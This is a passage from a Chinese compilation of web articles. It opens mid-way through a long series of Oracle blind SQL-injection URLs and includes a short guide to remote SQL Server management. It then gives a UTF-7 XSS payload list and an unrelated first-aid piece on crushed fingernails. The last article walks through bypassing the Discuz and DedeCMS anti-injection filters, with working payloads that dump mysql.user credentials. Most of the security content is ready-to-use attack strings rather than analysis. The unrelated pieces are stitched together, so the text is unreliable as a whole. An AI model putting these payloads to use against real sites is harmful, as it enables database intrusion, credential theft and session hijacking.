www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 51>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 50=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 50>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 48=ascii(substr((SELECT COUNT(*) FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

? 以下为猜解第一列的第一个字段名CLASS的长度为：5

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 5<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 9>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 7>nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 5=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

? 以下为猜解第一列第一个字段的第一位为：C

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 66=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 66>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

? 以下为猜解第一列第一个字段的第一位为:L

www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

? 以下为猜解第一列第一个字段的第三位为：A

www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 83>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 84>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 81=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 81>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

? 以下为猜解第二列：

www.test.net/index_kaoyan_view.jsp?id=117 And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 74>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 72=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_N

篇6：远程管理SQL数据的方法脚本安全

1、在的你计算机上安装sql server数据库的软件(注意：相同版本的数据库系统）

2、点击开始 -- 程序 -- Microsoft SQL Server -- 客户端网络实用工具 -- 另名 -- 点击添加 --- 网络库选取TCP/IP;服务器别名:数据库服务器的IP;服务器名称:数据库服务器的IP;端口默认1433 -- 确定

3、点击开始 -- 程序 -- Microsoft SQL Server -- 企业管理器 -- Mouse点 Microsoft SQL Servers -- mouse右键点 Sql Server 组;点新的sql server 注册.... -- 下一步 -- 增加主机IP，下一步---选”系统管理员给我分配的SQL Server登录信息....“.

下一步 -- 登录名:用户名、密码:密码、下一步 -- ……

4、联接成功后；请您找到您的数据库；你就可管理你的数据库，

远程管理SQL数据的方法脚本安全

，

注：不要越权。一般情况下你是只能看到别的数据库的名称而没有管理权限！！！

篇7：UTF7 XSS 常见利用方法脚本安全

1、基本样式

+ADw-script+AD4-alert(31337)+ADw-/script+AD4-

+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-

+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-

2、URL encoded 转换后的样式

%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-

3、利用引号’和”

+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-

”><“

4、URL编码,利用引号’和”

%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-

”><“

5、注入伪造的标签

+ADw-/title+AD4APA-meta. http-equiv+AD0-'content-type' content+AD0-'text/html+ADs-charset+AD0-utf-7'+AD4-

6、利用UTF-7 iframe

7、charset通过参数设定的

www.badguest.cn /?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&oe=Windows-31J

www. /?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&oe=CP932

www./?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&eo=MS932

www. /?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&cs=jis

www./?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&charset=utf8

www. /?q=%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-&enc=sjis

作者：独自等待

篇8：指甲被挤掉时的处理方法

急救措施

1、指甲被挤掉时，最重要的是防止细菌感染。应急处理时，道先把挤掉指甲的手指，用纱布、绷带包扎固定，再用冷袋冷敷。然后把伤肢抬高，立即去医院。

2、指甲缝破裂出血，可用蜂蜜对一半温开水，搅匀，每天抹几次，就可逐渐治愈。如果指甲破裂者是球类运动员，在治疗期间，如果需要继续打球，在打球之前，一定要用橡皮膏将手指末节包2-3层，加以保护，打完球后立即去掉，以免引起感染。

3、如果因外伤引起甲床下出血，血液未流出，使甲床根部隆起，疼痛难忍不能入睡时，可在近指甲根部用烧红的缝衣针扎一小孔，将积血排出，消毒后加压包扎指甲。

注意事项

1、手指甲被挤掉后，万一是夜间，不能去医院时，应对局部进行消毒，如家里有抗生素软膏，应除上一层。第二天一定要去医院诊治。

2、平时不要把指甲剪得太“秃”，否则会造成指甲缝破裂出血。

3、有指甲破裂出血史的人，还应在日常的膳食中注意多吃些含维生素a比较多的食物，如白菜、萝卜、韭菜和猪肝等，以增加皮肤的弹性。

篇9：几种通用防注入程序绕过方法脚本安全

0x00 前言

目前主流的CMS系统当中都会内置一些防注入的程序，例如Discuz、dedeCMS等，本篇主要介绍绕过方法，

0x01 Discuz x2.0防注入

防注入原理

这里以Discuz最近爆出的一个插件的注入漏洞为例，来详细说明绕过方法。

漏洞本身很简单，存在于/source/plugin/v63shop/config.inc.php中的第29行getGoods函数中，代码如下所示

触发漏洞的入口点在/source/plugin/v63shop/goods.inc.php中的第6行和第8行，如图所示：

下面可以构造如下请求触发漏洞了，如图所示：

不过程序内置了一个_do_query_safe函数用来防注入，如图所示

这里跟踪一下_do_query_safe()函数的执行，它会对以下关键字做过滤，如图所示：

因为我们的url中出现了union select，所以会被过滤掉。

绕过方法

这里利用Mysql的一个特性绕过_do_query_safe函数过滤，提交如下url：

localhost/discuzx2/plugin.php?id=v63shop:goods&pac=info&gid=1 and 1=2 union /*!50000select*/ 1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user

这里我们跟踪一下，绕过的具体过程。它会将/**/中间的内容去掉，然后保存在$clean变量中，其值为

select * from pre_v63_goods where `id` =1 and 1=2 union /**/ 1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user

再进一步跟踪，它会将/**/也去掉，然对$clean变量做过滤，如图所示

此时$clean值，如图所示

此时$clean变量中不在含有危险字符串，绕过_do_query_safe函数过滤，成功注入，截图如下：

0x02 Discuz X2.5防注入

防注入原理

Discuz X2.5版修改了防注入函数的代码，在/config/config_global.php中有如下代码，如图所示

这里$_config['security']['querysafe']['afullnote'] 默认被设置为0，重点关注这一点。

这里跟踪一下失败的原因，如图所示：

此时观察一下变量，_do_query_safe($sql)函数会将/**/中的内容去掉，然后存到$clean中，如图所示：

其实，程序执行到这里跟Discuz X2.0没有区别，$clean的值都一样。但是关键在下面，如图所示：

因为前面提到$_config['security']['querysafe']['afullnote']=’0’，所以这里不会替换/**/为空，并且它在后面会判断$clean中是否会出现“/*”，如图所示：

所以注入失败。

绕过方法

在Mysql当中，定义变量用@字符，可以用set @a=’abc’，来为变量赋值。这里为了合法的构造出一个单引号，目的是为了让sql正确，我们可以用@'放入sql语句当中，帮助我们绕过防注入程序检查。

这里利用如下方式绕过_do_query_safe函数过滤，如下所示：

localhost/discuz/plugin.php?id=v63shop:goods&pac=info&gid=@`'` union select @`'`,2,3,4,5,6,7,concat(user,0x3a,password),9,10,11,12,13,14 from mysql.user

这里跟踪一下执行的过程，如图所示：

这里有一个if判断，重点看这句

$clean = preg_replace(”/'(.+?)'/s“, '', $sql);

它会将$sql中单引号引起来的字符串省略掉，所以我们可以用绕过dede防住ids的思路，利用

@`'` union select @`'`

这样的方法，在下面的过滤中省掉union select，这里跟踪一下，如图所示：

这样便绕过了_do_query_safe函数检测，成功绕过防注入，如图所示：

不过后来Discuz官方发布了一个修复补丁，但并没用从根本上解决问题。官方的修复代码如下：

加了一个判断，过滤字符串中的@，但是始终没有修复根本问题，关键是上边的那个if判断会将单引号之间的内容（包括单引号）替换为空，代码如下：

if (strpos($sql, '/') === false && strpos($sql, '#') === false && strpos($sql, '-- ') === false) { $clean = preg_replace(”/'(.+?)'/s“, '', $sql);}

这里我只要稍做一下变换就可以让@字符消失，从而绕过它的过滤，利用如下所示：

localhost/discuz/plugin.php?id=v63shop:goods&pac=info&gid=`'` or @`''` union select 1 from (select count(*),concat((select database()),floor(rand(0)*2))a from information_schema.tables group by a)b where @`'`

这里我引入了`'`用来隐藏第一个@字符，并将第一个@`'`替换为@`''`，这样便可以替换掉第二个@，这里我们跟踪一下代码，如图所示：

可以看到$clean变为

select * from pre_v63_goods where `id` =``

成功绕过补丁，如图所示：

不过这样做的代价是不能再使用union select了，只能通过报错获取数据。

0x03 DedeCMS防注入

防注入原理

这里我也以最近热点分析的dedeCMS feedback.php注入漏洞为例，分析如何绕过其防注入系统。不过在这之前，还得先提一下这个漏洞。

漏洞存在于/plus/feedback.php中的第244行，代码如下所示

if($comtype == 'comments') { $arctitle = addslashes($title); 0id = intval(0id); $ischeck = intval($ischeck); $feedbacktype = preg_replace(”#[^0-9a-z]#i“, ”“, $feedbacktype); if($msg!='') { $inquery = ”INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('$aid','0id','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); “; $rs = $dsql->ExecuteNoneQuery($inquery); if(!$rs) { ShowMsg(' 发表评论错误! ', '-1'); //echo $dsql->GetError(); exit(); } } } //引用回复 elseif ($comtype == 'reply') { $row = $dsql->GetOne(”SELECT * FROM `#@__feedback` WHERE id ='$fid'“); $arctitle = $row['arctitle']; $aid =$row['aid']; $msg = $quotemsg.$msg; $msg = HtmlReplace($msg, 2); $inquery = ”INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('$aid','0id','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')“; $dsql->ExecuteNoneQuery($inquery); }

这里$title变量未初始化，所以$title可以作为可控变量，所以我们可以进一步控制$arctitle。跟踪发现$arctitle被直接带入SQL语句当中，但是这里执行的INSERT语句入库之后会将前面addslashes转义的单引号在会员还原回去。进一步跟踪下面的代码，在第268行，如下所示

$row = $dsql->GetOne(”SELECT * FROM `#@__feedback` WHERE id ='$fid'“);$arctitle = $row['arctitle'];

这里的查询#@__feedback表正式上面INSERT的那个表，arctitle字段取出来放到$arctitle变量当中，继续跟踪到第273行，这下豁然开朗了，

$inquery = ”INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('$aid','0id','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')“;

这里$arctitle变量未作任何处理，就丢进了SQL语句当中，由于我们可以控制$title，虽然$arctitle是被addslashes函数处理过的数据，但是被INSERT到数据库中又被还原了，所以综合起来这就造成了二次注入漏洞。

但是这里如何利用呢，通过跟踪代码发现，整个dede在整个过程中始终没有输出信息，所以我们无法通过构造公式报错来获取数据，但是进一步分析代码发现#@__feedback表当中的msg字段会被输出。由于$arctitle变量是可控的，所以我们可以通过构造SQL语句，将我们要执行的代码插入到msg字段当中，这样便可以输出执行的内容了。

绕过方法

众所周知，dedeCMS内置了一个CheckSql()函数用来防注入，它是80sec开发的通用防注入ids程序，每当执行sql之前都要用它来检查一遍。其代码如下所示：

但通过跟踪这段代码发现，它有个特征就是会将两个单引号之间的内容用$s$替换，例如’select’会被替换为$s$，这里用两个@`'`包含敏感字，这样$clean变量中就不会出现敏感字，从而绕过CheckSql()函数检测，

这里可以设置title为如下代码，一方面绕过ids防注入代码检测，另一方面加一个#注释掉后面的代码，但是还要做一下变形，就是这个char(@`'`)了。因为#@__feedback的所有字段都被设置为NOT NULL，而@`'`是一个变量，默认为NULL，直接插入@`'`的话会报错，所以需要以char(@`'`)的方法转换一下。

',char(@`'`),1,1,1,1,1,1,1,(SELECT user()))#,(1,

跟踪代码，如图所示

如下SQL语句

INSERT INTO `dede_feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('1','1','游客','\',char(@`\'`),1,1,1,1,1,1,1,(SELECT user()))#,(1,','127.0.0.1','1','1364401789', '0','0','0','feedback','1','genxor');

被替换为了

insert into `dede_feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`) values ($s$,$s$,$s$,$s$,$s$,$s$,$s$, $s$,$s$,$s$,$s$,$s$,$s$);

字符串中没有任何敏感字，成功绕过CheckSql()函数检测。

POST如下请求给feedback.php，如下所示：

action=send&comtype=comments&aid=1&isconfirm=yes&feedbacktype=feedback&face=1&msg=genxor¬user=1&typeid=1&title=',char(@`'`),1,1,1,1,1,1,1,(SELECT user()))#,(1,

跟踪代码，实际执行的SQL语句跟踪变量如下所示：

入数据库中的内容，如图所示：

下面再POST如下内容给feedback.php，

action=send&comtype=reply&aid=1&isconfirm=yes&feedbacktype=feedback&fid=50

跟踪一下这里执行的SQL语句，如图所示

所以select user()执行了，并且可以作为msg字段输出。

0x04 总结

在写这篇文章之前，我分析了很多常用的cms系统的源码，包括discuz、dedecms、phpwind、phpcms等，只有在discuz、dedecms这两个系统中用到通用防注入，但是它们所覆盖的用户群已将相当庞大了。如果能在发现程序注入漏洞的情况下，这些绕过方法还是很有价值的。